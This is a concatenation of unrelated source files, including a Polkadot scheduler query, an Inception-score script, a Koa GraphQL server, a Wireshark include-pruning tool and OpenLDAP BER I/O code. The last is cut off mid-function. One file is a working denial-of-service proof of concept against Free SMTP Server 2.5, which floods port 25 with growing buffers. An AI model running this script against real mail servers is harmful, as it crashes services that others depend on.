return api.derive.democracy.referendumsFinished().pipe(switchMap(() => api.query.scheduler.agenda.keys()), switchMap(keys => {
const blockNumbers = keys.map(({
args: [blockNumber]
}) => blockNumber);
return blockNumbers.length ? combineLatest([of(blockNumbers), // this should simply be api.query.scheduler.agenda.multi<Vec<Option<Scheduled>>>,
// however we have had cases on Darwinia where the indices have moved around after an
// upgrade, which results in invalid on-chain data
combineLatest(blockNumbers.map(blockNumber => api.query.scheduler.agenda(blockNumber).pipe( // this does create an issue since it discards all at that block
catchError(() => of(null)))))]) : of([[], []]);
}));
}
function queryScheduler(api) {
return schedulerEntries(api).pipe(switchMap(([blockNumbers, agendas]) => {
const result = [];
blockNumbers.forEach((at, index) => {
(agendas[index] || []).filter(opt => opt.isSome).forEach(optScheduled => {
const scheduled = optScheduled.unwrap();
if (scheduled.maybeId.isSome) {
const id = scheduled.maybeId.unwrap().toHex();
if (id.startsWith(DEMOCRACY_ID)) {
const [, index] = api.registry.createType('(u64, ReferendumIndex)', id);
const imageHash = scheduled.call.args[0];
result.push({
at,
imageHash,
index
});
}
}
});
});
return result.length ? combineLatest([of(result), api.derive.democracy.preimages(result.map(({
imageHash
}) => imageHash))]) : of([[], []]);
}), map(([infos, images]) => infos.map((info, index) => _objectSpread(_objectSpread({}, info), {}, {
image: images[index]
}))));
}
export function dispatchQueue(instanceId, api) {
return memo(instanceId, () => {
var _api$query$scheduler;
return isFunction((_api$query$scheduler = api.query.scheduler) === null || _api$query$scheduler === void 0 ? void 0 : _api$query$scheduler.agenda) ? queryScheduler(api) : api.query.democracy.dispatchQueue ? queryQueue(api) : of([]);
});
}
|
''' Calculate Inception Moments
Adapted from https://github.com/ajbrock/BigGAN-PyTorch/blob/master/calculate_inception_moments.py
under the MIT license.
This script iterates over the dataset and calculates the moments of the
activations of the Inception net (needed for FID), and also returns
the Inception Score of the training data.
Note that if you don't shuffle the data, the IS of true data will be under-
estimated as it is label-ordered. By default, the data is not shuffled
so as to reduce non-determinism. '''
import os
import shutil
import tempfile
import numpy as np
import smart_open
import torch
import torch.nn.functional as F
import torch.utils.data as data_utils
from torchvision import transforms
from .image_bytes_dataset import ImageBytesDataset
from .trainers.tqdm_newlines import tqdm_class, tqdm_kwargs
from . import inception_utils
def calculate_inception_moments(loader, use_newlines=False, log_iters=10, quiet_logs=False):
device = 'cuda' if torch.cuda.is_available() else 'cpu'
print(f'Using device "{device}"')
print('Loading inception net...')
net = inception_utils.load_inception_net(parallel=False)
net = net.to(device)
pool, logits = [], []
print('Evaluating dataset activations...')
tqdm = tqdm_class(use_newlines)
progress_iter = tqdm(loader, **tqdm_kwargs(quiet_logs, log_iters))
for i, x in enumerate(progress_iter):
x = x.to(device)
with torch.no_grad():
pool_val, logits_val = net(x)
pool += [np.asarray(pool_val.cpu())]
logits += [np.asarray(F.softmax(logits_val, 1).cpu())]
pool, logits = [np.concatenate(item, 0) for item in [pool, logits]]
print('Calculating inception metrics...')
IS_mean, IS_std = inception_utils.calculate_inception_score(logits)
print('Training data from dataset has IS of %5.5f +/- %5.5f' % (IS_mean, IS_std))
# Compute mu and sigma over the pooled activations (needed later for FID).
print('Calculating means and covariances...')
mu, sigma = np.mean(pool, axis=0), np.cov(pool, rowvar=False)
return mu, sigma
if __name__ == '__main__':
import argparse
p = argparse.ArgumentParser(description='Create image data from a folder.')
p.add_argument('source', help='Root path of dataset')
p.add_argument('destination', help='Output location')
p.add_argument('--batch-size', type=int, default=32)
p.add_argument('--log-iters', type=int, default=10)
p.add_argument('--quiet-logs', action='store_true',
help='Less verbose logs')
p.add_argument('--log-newlines', action='store_true',
help='Use newlines instead of carriage returns in progress bar.')
p.add_argument('--cleanup-inception-model', action='store_true',
help='Delete the pre-trained model after use.')
args = p.parse_args()
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
])
print(f'Loading dataset from {args.source}')
dataset = ImageBytesDataset.from_path(
args.source, transform=transform
)
loader = data_utils.DataLoader(
dataset, batch_size=args.batch_size, shuffle=True, drop_last=True
)
if args.cleanup_inception_model:
model_path = tempfile.mkdtemp()
os.environ['TORCH_HOME'] = model_path
print(f'Setting $TORCH_HOME to {model_path}')
try:
mu, sigma = calculate_inception_moments(
loader, use_newlines=args.log_newlines, quiet_logs=args.quiet_logs,
log_iters=args.log_iters
)
finally:
if args.cleanup_inception_model:
print('Deleting pretrained model...')
shutil.rmtree(model_path)
print(f'Saving calculated means and covariances to "{args.destination}"...')
with smart_open.open(args.destination, 'wb') as outfile:
np.savez(outfile, mu=mu, sigma=sigma)
|
import koa from "koa";
import koaRouter from "koa-router";
import koaBody from "koa-bodyparser";
import { graphqlKoa, graphiqlKoa } from "apollo-server-koa";
import configs from './configs';
import { schema } from "./schemas"
const app = new koa();
const router = new koaRouter();
// parse POST request bodies
app.use(koaBody())
// set up the GraphQL and GraphiQL routes
router.get('/graphql', graphqlKoa({ schema: schema }));
router.post('/graphql', graphqlKoa({ schema: schema }))
router.get('/graphiql', graphiqlKoa({ endpointURL: '/graphql' }));
// mount the router
app.use(router.routes());
app.listen(configs.port, () => {
console.log('app listening on port ' + configs.port);
})
|
#!/usr/bin/env python
"""
Command-line utility for administrative tasks.
# For more information about this file, visit
# https://docs.djangoproject.com/en/2.1/ref/django-admin/
"""
import os
import sys
if __name__ == '__main__':
os.environ.setdefault(
'DJANGO_SETTINGS_MODULE',
'CS50WebProgramming.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
export const MAINNET = 'mainnet'
export const RINKEBY = 'rinkeby'
export const PRODUCTION = 'production'
export const PRE_PRODUCTION = 'pre-production'
export const STAGING = 'staging'
export const DEVELOPMENT = 'development'
export const NETWORK_NAME = 'NETWORK_NAME'
export const NETWORK_VERSION = 'NETWORK_VERSION'
export const NETWORK_URL = 'NETWORK_URL'
export const PUSH_NOTIFICATION_SERVICE_URL = 'PUSH_NOTIFICATION_SERVICE_URL'
export const TRANSACTION_RELAY_SERVICE_URL = 'TRANSACTION_RELAY_SERVICE_URL'
export const ANDROID_APP_URL = 'ANDROID_APP_URL'
export const IOS_APP_URL = 'IOS_APP_URL'
export const TOKEN_LIST_URL = 'TOKEN_LIST_URL'
export const FIREBASE_AUTH_DOMAIN = 'FIREBASE_AUTH_DOMAIN'
export const FIREBASE_DATABASE_URL = 'FIREBASE_DATABASE_URL'
export const FIREBASE_PROJECT_ID = 'FIREBASE_PROJECT_ID'
export const FIREBASE_STORAGE_BUCKET = 'FIREBASE_STORAGE_BUCKET'
export const FIREBASE_MESSAGING_SENDER_ID = 'FIREBASE_MESSAGING_SENDER_ID'
export const FAVICON = 'FAVICON'
|
from pymsbuild._types import *
class DllPackage(PydFile):
r"""Represents a DLL-packed package.
This is the equivalent of a regular `Package`, but the output is a
compiled DLL that exposes submodules and resources using an import hook.
Add `CFunction` elements to expose native functions from the packed DLL."""
options = {
**PydFile.options,
}
def __init__(self, name, *members, project_file=None, **kwargs):
super().__init__(
name,
*members,
LiteralXML('<Import Project="$(PyMsbuildTargets)\\dllpack.targets" />'),
project_file=project_file,
**kwargs
)
class CFunction:
r"""Represents a function exposed in a DLL-packed package.
The named function must be provided in a `CSourceFile` element and
follow this prototype:
```
PyObject *function(PyObject *module, PyObject *args, PyObject *kwargs)
```
It will be available in the root of the package as the same name.
"""
_ITEMNAME = "DllPackFunction"
def __init__(self, name, **options):
self.name = name
self.options = dict(**options)
def write_member(self, project, group):
group.switch_to("ItemGroup")
project.add_item(self._ITEMNAME, self.name, **self.options)
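# Minimal usage sketch (element names other than DllPackage, CFunction and
# CSourceFile are assumptions, not taken from this file):
#
#   PACKAGE = DllPackage(
#       "mypackage",
#       PyFile("mypackage/__init__.py"),
#       CSourceFile("src/fast.c"),
#       CFunction("fast_sum"),
#   )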
|
const Usage = require('./Usage');
const CommandPrompt = require('./CommandPrompt');
/**
* Converts usage strings into objects to compare against later
* @extends Usage
*/
class CommandUsage extends Usage {
/**
* @since 0.0.1
* @param {KlasaClient} client The klasa client
* @param {usageString} usageString The usage string for this command
* @param {usageDelim} usageDelim The usage delimiter for this command
* @param {Command} command The command this parsed usage is for
*/
constructor(client, usageString, usageDelim, command) {
super(client, usageString, usageDelim);
/**
* All names and aliases for the command
* @since 0.0.1
* @type {string[]}
*/
this.names = [command.name, ...command.aliases];
/**
* The compiled string for all names/aliases in a usage string
* @since 0.0.1
* @type {string}
*/
this.commands = this.names.length === 1 ? this.names[0] : `《${this.names.join('|')}》`;
/**
* The concatenated string of this.commands and this.deliminatedUsage
* @since 0.0.1
* @type {string}
*/
this.nearlyFullUsage = `${this.commands}${this.deliminatedUsage}`;
}
/**
* Creates a CommandPrompt instance to collect and resolve arguments with
* @since 0.5.0
* @param {KlasaMessage} message The message context from the prompt
* @param {TextPromptOptions} options The options for the prompt
* @returns {CommandPrompt}
*/
createPrompt(message, options = {}) {
return new CommandPrompt(message, this, options);
}
/**
* Creates a full usage string including prefix and commands/aliases for documentation/help purposes
* @since 0.0.1
* @param {KlasaMessage} message The message context for which to generate usage for
* @returns {string}
*/
fullUsage(message) {
let { prefix } = message.guildSettings;
if (Array.isArray(prefix)) prefix = prefix.find(pre => message.prefix.test(pre)) || prefix[0];
return `${prefix.length !== 1 ? `${prefix} ` : prefix}${this.nearlyFullUsage}`;
}
/**
* Defines to string behavior of this class.
* @since 0.5.0
* @returns {string}
*/
toString() {
return this.nearlyFullUsage;
}
}
module.exports = CommandUsage;
|
#ifndef NNUTILS_H
#define NNUTILS_H
#include <torch/torch.h>
#include <vector>
bool is_empty(at::Tensor x);
/* Clips gradient norm of an iterable of parameters.
* The norm is computed over all gradients together, as if they were
* concatenated into a single vector. Gradients are modified in-place.
* Arguments:
* parameters (Iterable[Tensor] or Tensor): an iterable of Tensors or a
* single Tensor that will have gradients normalized
* max_norm (float or int): max norm of the gradients
* Returns:
* Total norm of the parameters (viewed as a single vector).
*/
void ClipGradNorm(std::vector<at::Tensor> parameters, float max_norm);
at::Tensor upsample(at::Tensor x, float scale_factor);
at::Tensor unique1d(at::Tensor tensor);
at::Tensor intersect1d(at::Tensor tensor1, at::Tensor tensor2);
class SamePad2dImpl : public torch::nn::Module {
public:
SamePad2dImpl();
SamePad2dImpl(uint32_t kernel_size, uint32_t stride);
torch::Tensor forward(torch::Tensor input);
private:
uint32_t kernel_size_{0};
uint32_t stride_{0};
};
TORCH_MODULE(SamePad2d);
#endif // NNUTILS_H
|
const request = require("../helpers/request");
const ApiUrls = require("../helpers/ApiUrls");
const parameterChecker = require("../helpers/parameterChecker");
const url = new ApiUrls();
const getCoinInfo = (params) => {
return request(url.contracts.GetCoinInfoByContractAddressAndId(params["id"],params["contract_address"]),parameterChecker(params,["id","contract_address"],["id","contract_addresses"]));
}
const getMarketChart = (params) => {
return request(url.contracts.GetMarketChart(params["id"],params["contract_address"]),parameterChecker(params,["id","contract_address","vs_currency","days"],["id","contract_addresses"]));
}
const getMarketChartRange = (params) => {
return request(url.contracts.GetMarketChartRange(params["id"],params["contract_address"]),parameterChecker(params,["id","contract_address","vs_currency","from","to"],["id","contract_addresses"]));
}
module.exports = {
getCoinInfo,
getMarketChart,
getMarketChartRange
}
|
# Exploit Title: Free SMTP Server - Local Denial of Service Crash (PoC)
# Date: February 3, 2009
# Exploit Author: Metin Kandemir (kandemir)
# Vendor Homepage: http://www.softstack.com/freesmtp.html
# Software Link: https://free-smtp-server.en.uptodown.com/windows/download
# Version: 2.5
# Tested on: Windows 7 Service Pack 1 x64
# Software Description : Free SMTP server program to send emails directly from PC.
# ==================================================================
# The SMTP Server will crash when this code is run on localhost.
import socket
a=1
buffer = ["A"]
while a <= 20000:
a = a+1
buffer.append("A"*a)
for string in buffer:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('127.0.0.1',25))
s.send(string)
|
#!/usr/bin/python
# Martin Mathieson
# Look for and removes unnecessary includes in .cpp or .c files
#
# Wireshark - Network traffic analyzer
# By Gerald Combs <gerald@wireshark.org>
# Copyright 1998 Gerald Combs
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
import subprocess
import os
import sys
import shutil
def show_usage():
print('Usage: ./delete_includes.py <dissectors | wsutil | wiretap | ui | qt | plugins > [start_file] [stop_file]')
# Work out wireshark folder based upon CWD. Assume run in wireshark folder
# or from tools folder...
wireshark_root = os.getcwd()
root,lastdir = os.path.split(wireshark_root)
if lastdir == 'tools':
wireshark_root = root
# Make command depends upon platform.
if sys.platform.startswith('win'):
default_make_command = ['msbuild', '/m', '/p:Configuration=RelWithDebInfo', 'Wireshark.sln']
else:
default_make_command = ['make']
# Set parameters based upon string passed as argument.
if len(sys.argv) > 1:
if sys.argv[1] == 'dissectors':
print('dissectors target chosen!')
test_folder = os.path.join(wireshark_root, 'epan', 'dissectors')
run_folder = test_folder
make_command = default_make_command
elif sys.argv[1] == 'wsutil':
print('wsutil target chosen!')
test_folder = os.path.join(wireshark_root, 'wsutil')
run_folder = test_folder
make_command = default_make_command
elif sys.argv[1] == 'wiretap':
print('wiretap target chosen!')
test_folder = os.path.join(wireshark_root, 'wiretap')
run_folder = test_folder
make_command = default_make_command
elif sys.argv[1] == 'ui':
print('ui target chosen!')
test_folder = os.path.join(wireshark_root, 'ui')
run_folder = wireshark_root
make_command = default_make_command
elif sys.argv[1] == 'qt':
print('qt target chosen!')
test_folder = os.path.join(wireshark_root, 'ui', 'qt')
run_folder = wireshark_root
default_make_command.append('qt')
make_command = default_make_command
elif sys.argv[1] == 'plugins':
print('plugins target chosen!')
test_folder = os.path.join(wireshark_root, 'plugins')
run_folder = os.path.join(wireshark_root, 'plugins')
make_command = default_make_command
else:
print('Unrecognised command line option %s' % sys.argv[1])
show_usage()
sys.exit()
else:
# Print usage and bug out!
show_usage()
sys.exit()
# i.e. not looking for a first file to begin testing, and haven't found last one yet.
first_file_found = True
last_file_found = False
# Optional 2nd arg gives first filename to use. Useful for long runs that may
# sometimes be stopped early
if len(sys.argv) > 2:
first_file_to_test = sys.argv[2]
first_file_found = False
# Optional 3rd arg gives last filename to use. Useful for long runs that may
# sometimes be stopped early
last_file_to_test = ''
if len(sys.argv) > 3:
last_file_to_test = sys.argv[3]
# A list of header files that it is not safe to uninclude, as doing so
# has been seen to cause link failures against implemented functions...
# TODO: some of these could probably be removed on more permissive platforms.
includes_to_keep = []
includes_to_keep.append('config.h')
includes_to_keep.append('epan/packet.h')
includes_to_keep.append('stdlib.h')
includes_to_keep.append('math.h')
includes_to_keep.append('errno.h')
includes_to_keep.append('string.h')
# These are probably mostly redundant in that they are now covered by the check
# for 'self-includes'...
includes_to_keep.append('x11-keysym.h')
includes_to_keep.append('packet-dcom-dispatch.h')
includes_to_keep.append('packet-ax25.h')
includes_to_keep.append('packet-atm.h')
includes_to_keep.append('packet-atalk.h')
includes_to_keep.append('packet-ppp.h')
includes_to_keep.append('packet-scsi-mmc.h')
includes_to_keep.append('packet-t30.h')
includes_to_keep.append('packet-tls.h')
# Stats
files_examined = 0
includes_tested = 0
includes_deleted = 0
files_not_built = 0
files_not_built_list = []
generated_files_ignored = []
skipped_before_first = 0
includes_to_keep_kept = 0
# We want to confirm that this file is actually built as part of the make target.
# To do this, add some garbage to the front of the file and confirm that the
# build then fails. If it doesn't, we won't want to remove #includes from that file!
def test_file_is_built(root, filename):
temp_filename = filename + '.tmp'
f_read = open(filename, 'r')
write_filename = filename + '.new'
f_write = open(write_filename, 'w')
# Write the file with nonsense at start.
f_write.write('NO WAY THIS FILE BUILDS!!!!!')
# Copy remaining lines as-is.
for line in f_read:
f_write.write(line)
f_read.close()
f_write.close()
# Backup file, and do this build with the one we wrote.
shutil.copy(filename, temp_filename)
shutil.copy(write_filename, filename)
# Try the build.
os.chdir(run_folder)
result = subprocess.call(make_command)
# Restore proper file & delete temp files
os.chdir(root)
shutil.copy(temp_filename, filename)
os.remove(temp_filename)
os.remove(write_filename)
if result == 0:
# Build succeeded so this file wasn't in it
return False
else:
# Build failed so this file *is* part of it
return True
# Function to test removal of each #include from a file in turn.
# At the end, only those that appear to be needed will be left.
def test_file(root, filename):
print('')
print('------------------------------')
print('Testing %s' % filename)
temp_filename = filename + '.tmp'
# Test if file seems to be part of the build.
is_built = test_file_is_built(root, filename)
if not is_built:
print('***** File not used in build, so ignore!!!!')
global files_not_built
global files_not_built_list
files_not_built = files_not_built + 1
# TODO: should os.path.join with root before adding?
files_not_built_list.append(filename)
return
else:
print('This file is part of the build')
# OK, we are going to test removing includes from this file.
tested_line_number = 0
# Don't want to delete 'self-includes', so prepare filename.
module_name,extension = os.path.splitext(filename)
module_header = module_name + '.h'
# Loop around, finding all possible include lines to comment out
while (True):
have_deleted_line = False
result = 0
# Go into folder
os.chdir(root)
# Open read & write files
f_read = open(filename, 'r')
write_filename = filename + '.new'
f_write = open(write_filename, 'w')
# Walk the file again looking for another place to comment out an include
this_line_number = 1
hash_if_level = 0
for line in f_read:
this_line_deleted = False
# Maintain view of how many #if or #ifdefs we are in.
# Don't want to remove any includes that may not be active in this build.
if line.startswith('#if'):
hash_if_level = hash_if_level + 1
if line.startswith('#endif'):
if hash_if_level > 1:
hash_if_level = hash_if_level - 1
# Consider deleting this line if we haven't already reached it.
if (not have_deleted_line and (tested_line_number < this_line_number)):
# Test line for starting with #include, and eligible for deletion.
if line.startswith('#include ') and hash_if_level == 0 and line.find(module_header) == -1:
# Check that this isn't a header file that known unsafe to uninclude.
allowed_to_delete = True
global includes_to_keep
for entry in includes_to_keep:
if line.find(entry) != -1:
allowed_to_delete = False
global includes_to_keep_kept
includes_to_keep_kept = includes_to_keep_kept + 1
continue
if allowed_to_delete:
# OK, actually doing it.
have_deleted_line = True
this_line_deleted = True
tested_line_number = this_line_number
# Write line to output file, unless this very one was deleted.
if not this_line_deleted:
f_write.write(line)
this_line_number = this_line_number + 1
# Close both files.
f_read.close()
f_write.close()
# If we commented out a line, try to build file without it.
if (have_deleted_line):
# Test a build. 0 means success, others are failures.
shutil.copy(filename, temp_filename)
shutil.copy(write_filename, filename)
# Assuming Makefile is in root of test folder, need to go there to do make!
os.chdir(run_folder)
result = subprocess.call(make_command)
if result == 0:
print('***** Good build')
# Line was eliminated so decrement line counter
tested_line_number = tested_line_number - 1
# Inc successes counter
global includes_deleted
includes_deleted = includes_deleted + 1
# Good - promote this version by leaving it here!
# Occasionally fails so delete this file each time.
# TODO: this is very particular to dissector target...
if sys.argv[1] == 'dissectors':
os.remove(os.path.join(run_folder, 'vc100.pdb'))
else:
print('***** Bad build')
# Never mind, go back to previous building version
os.chdir(root)
shutil.copy(temp_filename, filename)
# Inc counter of tried
global includes_tested
includes_tested = includes_tested + 1
else:
# Reached the end of the file without making changes, so nothing doing.
# Delete temporary files
if os.path.isfile(temp_filename):
os.remove(temp_filename)
if os.path.isfile(write_filename):
os.remove(write_filename)
return
# Test for whether the given file is under source control
def under_version_control(filename):
# TODO: is there a git module to allow testing like pysvn? Else actually
# shell out command-line 'git' and check output...?
return True
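# A possible answer to the TODO above (illustrative sketch only; not wired into
# the script). It shells out to 'git ls-files --error-unmatch', which exits
# non-zero for untracked files, using only the already-imported modules.
def under_version_control_git(filename):
    try:
        output = subprocess.check_output(
            ['git', 'ls-files', '--error-unmatch', filename],
            stderr=subprocess.DEVNULL)
    except (subprocess.CalledProcessError, OSError):
        # Untracked file, or git not available.
        return False
    return len(output) > 0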
# Test for whether the given file was automatically generated.
def generated_file(filename):
# Special known case.
if filename == 'register.c':
return True
# Open file
f_read = open(filename, 'r')
lines_tested = 0
for line in f_read:
# The comment saying that it's generated is near the top, so give up once
# get a few lines down.
if lines_tested > 10:
f_read.close()
return False
if line.find('Generated automatically') != -1 or line.find('Autogenerated from') != -1 or line.find('is autogenerated') != -1 or line.find('automatically generated by Pidl') != -1 or line.find('Created by: The Qt Meta Object Compiler') != -1:
f_read.close()
# This file was generated.
global generated_files_ignored
generated_files_ignored.append(filename)
return True
lines_tested = lines_tested + 1
# OK, looks like a hand-written file!
f_read.close()
return False
######################################################################################
# MAIN PROGRAM STARTS HERE
######################################################################################
# First, confirm that the build is currently passing, if not give up now.
print('chdir into %s' % run_folder)
os.chdir(run_folder)
print('***** Doing an initial build to check we have a stable base.')
result = subprocess.call(make_command)
if result != 0:
print('***** Initial build failed - give up now!!!!')
exit (-1)
# OK, loop over files in test_folder and see what can be removed from each one
for root, subFolders, files in os.walk(test_folder):
for filename in files:
# Don't look for source files in folders containing a . (i.e. avoid .svn, .git)
if (root.find('.') == -1):
# Only looking for c/cpp files - changing header files would make each
# attempted build take much longer
if filename.endswith(".c") or filename.endswith(".cpp"):
os.chdir(root)
# May be waiting for first file to test - check.
if not first_file_found:
if first_file_to_test == filename:
first_file_found = True
# May be waiting for last file to test - check.
if not last_file_found:
if last_file_to_test == filename:
last_file_found = True
# Also want to filter out generated files that are not checked in.
if not generated_file(filename) and under_version_control(filename) and first_file_found and not last_file_found:
# OK, try this file
test_file(root, filename)
# Inc counter
files_examined = files_examined + 1
else:
if generated_file(filename):
reason = 'generated file...'
if not under_version_control(filename):
reason = 'not under source control'
if not first_file_found:
reason = 'not seen starting file %s yet' % first_file_to_test
skipped_before_first = skipped_before_first + 1
print('Ignoring %s: %s' % (filename, reason))
# Show summary stats of run
print('\n\n')
print('Summary')
print('=========')
print('files examined: %d' % files_examined)
print('includes tested: %d' % includes_tested)
print('includes deleted: %d' % includes_deleted)
print('files not built: %d' % files_not_built)
for abandoned_file in files_not_built_list:
print(' %s' % abandoned_file)
print('%d generated files not tested:' % len(generated_files_ignored))
for generated_file in generated_files_ignored:
print(' %s' % generated_file)
print('includes kept as not safe to remove: %d' % includes_to_keep_kept)
print('skipped before first: %d' % skipped_before_first)
|
/* io.c - ber general i/o routines */
/* $OpenLDAP$ */
/* This work is part of OpenLDAP Software <http://www.openldap.org/>.
*
* Copyright 1998-2021 The OpenLDAP Foundation.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted only as authorized by the OpenLDAP
* Public License.
*
* A copy of this license is available in the file LICENSE in the
* top-level directory of the distribution or, alternatively, at
* <http://www.OpenLDAP.org/license.html>.
*/
/* Portions Copyright (c) 1990 Regents of the University of Michigan.
* All rights reserved.
*
* Redistribution and use in source and binary forms are permitted
* provided that this notice is preserved and that due credit is given
* to the University of Michigan at Ann Arbor. The name of the University
* may not be used to endorse or promote products derived from this
* software without specific prior written permission. This software
* is provided ``as is'' without express or implied warranty.
*/
/* ACKNOWLEDGEMENTS:
* This work was originally developed by the University of Michigan
* (as part of U-MICH LDAP).
*/
#include "portable.h"
#include <stdio.h>
#include <ac/stdlib.h>
#include <ac/ctype.h>
#include <ac/errno.h>
#include <ac/socket.h>
#include <ac/string.h>
#include <ac/unistd.h>
#ifdef HAVE_IO_H
#include <io.h>
#endif
#include "lber-int.h"
#include "ldap_log.h"
ber_slen_t
ber_skip_data(
BerElement *ber,
ber_len_t len )
{
ber_len_t actuallen, nleft;
assert( ber != NULL );
assert( LBER_VALID( ber ) );
nleft = ber_pvt_ber_remaining( ber );
actuallen = nleft < len ? nleft : len;
ber->ber_ptr += actuallen;
ber->ber_tag = *(unsigned char *)ber->ber_ptr;
return( (ber_slen_t) actuallen );
}
/*
* Read from the ber buffer. The caller must maintain ber->ber_tag.
* Do not use to read whole tags. See ber_get_tag() and ber_skip_data().
*/
ber_slen_t
ber_read(
BerElement *ber,
char *buf,
ber_len_t len )
{
ber_len_t actuallen, nleft;
assert( ber != NULL );
assert( buf != NULL );
assert( LBER_VALID( ber ) );
nleft = ber_pvt_ber_remaining( ber );
actuallen = nleft < len ? nleft : len;
AC_MEMCPY( buf, ber->ber_ptr, actuallen );
ber->ber_ptr += actuallen;
return( (ber_slen_t) actuallen );
}
/*
* Write to the ber buffer.
* Note that ber_start_seqorset/ber_put_seqorset() bypass ber_write().
*/
ber_slen_t
ber_write(
BerElement *ber,
LDAP_CONST char *buf,
ber_len_t len,
int zero ) /* nonzero is unsupported from OpenLDAP 2.4.18 */
{
char **p;
assert( ber != NULL );
assert( buf != NULL );
assert( LBER_VALID( ber ) );
if ( zero != 0 ) {
ber_log_printf( LDAP_DEBUG_ANY, ber->ber_debug, "%s",
"ber_write: nonzero 4th argument not supported\n" );
return( -1 );
}
p = ber->ber_sos_ptr == NULL ? &ber->ber_ptr : &ber->ber_sos_ptr;
if ( len > (ber_len_t) (ber->ber_end - *p) ) {
if ( ber_realloc( ber, len ) != 0 ) return( -1 );
}
AC_MEMCPY( *p, buf, len );
*p += len;
return( (ber_slen_t) len );
}
/* Resize the ber buffer */
int
ber_realloc( BerElement *ber, ber_len_t len )
{
ber_len_t total, offset, sos_offset, rw_offset;
char *buf;
assert( ber != NULL );
assert( LBER_VALID( ber ) );
/* leave room for ber_flatten() to \0-terminate ber_buf */
if ( ++len == 0 ) {
return( -1 );
}
total = ber_pvt_ber_total( ber );
#define LBER_EXBUFSIZ 4060 /* a few words less than 2^N for binary buddy */
#if defined( LBER_EXBUFSIZ ) && LBER_EXBUFSIZ > 0
# ifndef notdef
/* don't realloc by small amounts */
total += len < LBER_EXBUFSIZ ? LBER_EXBUFSIZ : len;
# else
{ /* not sure what value this adds. reduce fragmentation? */
ber_len_t have = (total + (LBER_EXBUFSIZ - 1)) / LBER_EXBUFSIZ;
ber_len_t need = (len + (LBER_EXBUFSIZ - 1)) / LBER_EXBUFSIZ;
total = ( have + need ) * LBER_EXBUFSIZ;
}
# endif
#else
total += len; /* realloc just what's needed */
#endif
if ( total < len || total > (ber_len_t)-1 / 2 /* max ber_slen_t */ ) {
return( -1 );
}
buf = ber->ber_buf;
offset = ber->ber_ptr - buf;
sos_offset = ber->ber_sos_ptr ? ber->ber_sos_ptr - buf : 0;
/* if ber_sos_ptr != NULL, it is > ber_buf so that sos_offset > 0 */
rw_offset = ber->ber_rwptr ? ber->ber_rwptr - buf : 0;
buf = (char *) ber_memrealloc_x( buf, total, ber->ber_memctx );
if ( buf == NULL ) {
return( -1 );
}
ber->ber_buf = buf;
ber->ber_end = buf + total;
ber->ber_ptr = buf + offset;
if ( sos_offset )
ber->ber_sos_ptr = buf + sos_offset;
if ( ber->ber_rwptr )
ber->ber_rwptr = buf + rw_offset;
return( 0 );
}
void
ber_free_buf( BerElement *ber )
{
assert( LBER_VALID( ber ) );
if ( ber->ber_buf) ber_memfree_x( ber->ber_buf, ber->ber_memctx );
ber->ber_buf = NULL;
ber->ber_sos_ptr = NULL;
ber->ber_valid = LBER_UNINITIALIZED;
}
void
ber_free( BerElement *ber, int freebuf )
{
if( ber == NULL ) {
LDAP_MEMORY_DEBUG_ASSERT( ber != NULL );
return;
}
if( freebuf ) ber_free_buf( ber );
ber_memfree_x( (char *) ber, ber->ber_memctx );
}
int
ber_flush( Sockbuf *sb, BerElement *ber, int freeit )
{
return ber_flush2( sb, ber,
freeit ? LBER_FLUSH_FREE_ON_SUCCESS
: LBER_FLUSH_FREE_NEVER );
}
int
ber_flush2( Sockbuf *sb, BerElement *ber, int freeit )
{
ber_len_t towrite;
ber_slen_t rc;
assert( sb != NULL );
assert( ber != NULL );
assert( SOCKBUF_VALID( sb ) );
assert( LBER_VALID( ber ) );
if ( ber->ber_rwptr == NULL ) {
ber->ber_rwptr = ber->ber_buf;
}
towrite = ber->ber_ptr - ber->ber_rwptr;
if ( sb->sb_debug ) {
ber_log_printf( LDAP_DEBUG_TRACE, sb->sb_debug,
"ber_flush2: %ld bytes to sd %ld%s\n",
towrite, (long) sb->sb_fd,
ber->ber_rwptr != ber->ber_buf ? " (re-flush)" : "" );
ber_log_bprint( LDAP_DEBUG_BER, sb->sb_debug,
ber->ber_rwptr, towrite );
}
while ( towrite > 0 ) {
#ifdef LBER_TRICKLE
sleep(1);
rc = ber_int_sb_write( sb, ber->ber_rwptr, 1 );
#else
rc = ber_int_sb_write( sb, ber->ber_rwptr, towrite );
#endif
if ( rc <= 0 ) {
if ( freeit & LBER_FLUSH_FREE_ON_ERROR ) ber_free( ber, 1 );
return -1;
}
towrite -= rc;
ber->ber_rwptr += rc;
}
if ( freeit & LBER_FLUSH_FREE_ON_SUCCESS ) ber_free( ber, 1 );
return 0;
}
BerElement *
ber_alloc_t( int options )
{
BerElement *ber;
ber = (BerElement *) LBER_CALLOC( 1, sizeof(BerElement) );
if ( ber == NULL ) {
return NULL;
}
ber->ber_valid = LBER_VALID_BERELEMENT;
ber->ber_tag = LBER_DEFAULT;
ber->ber_options = options;
ber->ber_debug = ber_int_debug;
assert( LBER_VALID( ber ) );
return ber;
}
BerElement *
ber_alloc( void ) /* deprecated */
{
return ber_alloc_t( 0 );
}
BerElement *
der_alloc( void ) /* deprecated */
{
return ber_alloc_t( LBER_USE_DER );
}
BerElement *
ber_dup( BerElement *ber )
{
BerElement *new;
assert( ber != NULL );
assert( LBER_VALID( ber ) );
if ( (new = ber_alloc_t( ber->ber_options )) == NULL ) {
return NULL;
}
*new = *ber;
assert( LBER_VALID( new ) );
return( new );
}
void
ber_init2( BerElement *ber, struct berval *bv, int options )
{
assert( ber != NULL );
(void) memset( (char *)ber, '\0', sizeof( BerElement ));
ber->ber_valid = LBER_VALID_BERELEMENT;
ber->ber_tag = LBER_DEFAULT;
ber->ber_options = (char) options;
ber->ber_debug = ber_int_debug;
if ( bv != NULL ) {
ber->ber_buf = bv->bv_val;
ber->ber_ptr = ber->ber_buf;
ber->ber_end = ber->ber_buf + bv->bv_len;
}
assert( LBER_VALID( ber ) );
}
/* OLD U-Mich ber_init() */
void
ber_init_w_nullc( BerElement *ber, int options )
{
